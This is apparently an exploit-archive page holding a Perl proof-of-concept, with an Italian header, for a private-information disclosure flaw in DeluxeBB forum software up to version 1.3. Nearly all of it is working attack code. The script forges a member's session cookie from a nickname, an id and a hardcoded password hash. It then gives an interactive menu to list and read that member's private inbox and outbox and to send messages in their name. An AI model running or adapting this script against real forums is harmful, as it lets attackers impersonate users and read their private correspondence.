1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 |
====================================================================== DeluxeBB <= 1.3 Private Info Disclosure Vis Intelligendi ====================================================================== VIS INTELLIGENDI http://vis-intelligendi.co.cc Un hacker Ë principalmente un filosofo. Conoscenza. ====================================================================== Explanation: details on http://vis-intelligendi.co.cc (search deluxebb) ====================================================================== Perl Exploit : #!usr/bin/perl # DeluxeBB 1.3 <= Info Disclosure ( pm.php ) # Vis Intelligendi. use LWP::UserAgent; use HTTP::Request; use Switch; my ($site,$membercookie,$memberid) = @ARGV; my $memberpw = '6e6bc4e49dd477ebc98ef4046c067b5f'; #ciao \\ Inutile my $inbox = '/pm?sub=folder&name=inbox'; my $outbox = '/pm?sub=folder&name=outbox'; my $general = '/pm.php'; my $new = '/pm.php?sub=newpm'; if (@ARGV < 3) { die "\n Usage: perl x.pl site nick id\n\n"; exit; } &general; sub broswer() { $bro = LWP::UserAgent->new(); $bro->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"); $bro->default_header("Cookie" => "membercookie=$membercookie; memberpw=$memberpw; memberid=$memberid"); } sub general() { &broswer; $req = HTTP::Request->new(GET => $site.$general); my $res = $bro->request($req); $content = $res->content(); while ($content =~ /<span class="misctext">(\d*)<\/span><\/td>/g) { push(@pm,$1); } &splash_gen; &sh; } sub splash() { print "--------------------------------------------\n"; print " DeluxeBB Info Disclosure <= 1.3\n"; print " Vis Intelligendi \n"; print " http://vis-intelligendi.co.cc \n"; print "--------------------------------------------\n"; } sub splash_gen() { system("clear"); &splash; print "-------------------------------------------\n"; print " Site: $site \n"; print " General Pm of: $membercookie\n"; print "-------------------------------------------\n"; print "ReadUnread \n\n"; print " Inbox :$pm[1]$pm[2]\n"; print " Outbox:$pm[3]$pm[4]\n"; print " Saves: $pm[5]$pm[6] \n"; print " Tracker: $pm[7]$pm[8]\n"; } sub sh() { print "\n sh> "; $sh = <stdin>; chomp $sh; switch($sh) { case "help" { &sh::help; } case "quit" { system "clear";exit(); } case "inbox" { &inbox; } case "outbox" { &outbox; } case "new" { &newpm; } case "read" { &read; } } } sub sh::help() { system("clear"); print q( ----------------------------- DeluxeBB <= 1.3 Info Shell ----------------------------- help - Leggi questo faq quit - Termina exploit inbox - Leggi inbox outbox - Leggi outbox read - Leggi pm new - Scrivi pm ); sleep(3); &splash_gen; &sh; } sub inbox() { &broswer; $req = HTTP::Request->new(GET => $site.$inbox); $res = $bro->request($req); $content = $res->content(); while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g) { push(@inbox_l,$1); push(@inbox_t,$2); } while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@inbox_f,$1); } &splash; print "--------------------------------------------------\n"; for my $indice (0..$#inbox_l) { $inbox_l[$indice] =~ s/amp;//g; print " $inbox_l[$indice]- Title: $inbox_t[$indice]- From:$inbox_f[$indice]\n"; } print "--------------------------------------------------\n"; (@inbox_l,@inbox_t,@inbox_f) = ''; &sh; } sub outbox() { &broswer; $req = HTTP::Request->new(GET => $site.$outbox); $res = $bro->request($req); $content = $res->content(); while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g){push(@outbox_l,$1);push(@outbox_t,$2); } while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@outbox_f,$1);} &splash; print "--------------------------------------------------\n"; for my $indice (0..$#outbox_l){ $outbox_l[$indice] =~ s/amp;//g; print " $outbox_l[$indice]- Title: $outbox_t[$indice]- To:$outbox_f[$indice]\n"; } print "--------------------------------------------------\n"; (@outbox_l,@outbox_t,@outbox_f) = ''; &sh; } sub read() { &broswer; &splash; print "\nInserire link pm: "; $link = <stdin>; chomp($link); $req = HTTP::Request->new(GET => $site.$link); $res = $bro->request($req); $content = $res->content(); while ($content =~ /<span class="inputarea"><span class="inputarea">(.*)<\/span><\/span>/g) { push(@pm_r,$1); } print "---------------------------------\n"; print " Reading PM: $site$link \n"; print " Of : $membercookie\n"; print "---------------------------------\n"; $pm_r[0] =~ s/<br \/>//g; print @pm_r; @pm_r = ''; &sh; } sub newpm { system("cls"); &splash; print "\nTo:"; $to = <stdin>; print "\nTitle:"; $tit = <stdin>; print "\nContent:"; $contnet = <stdin>; chomp($to,$tit,$contnet); &broswer; $res = $bro->post($site.$new,["to" => $to, "subject" => $tit, "posticon" => 'bigsmile.gif', "rte1" => $contnet, "submit" => 'Send']); print "\n Sended pm to $to from $membercookie\n "; &sh; } |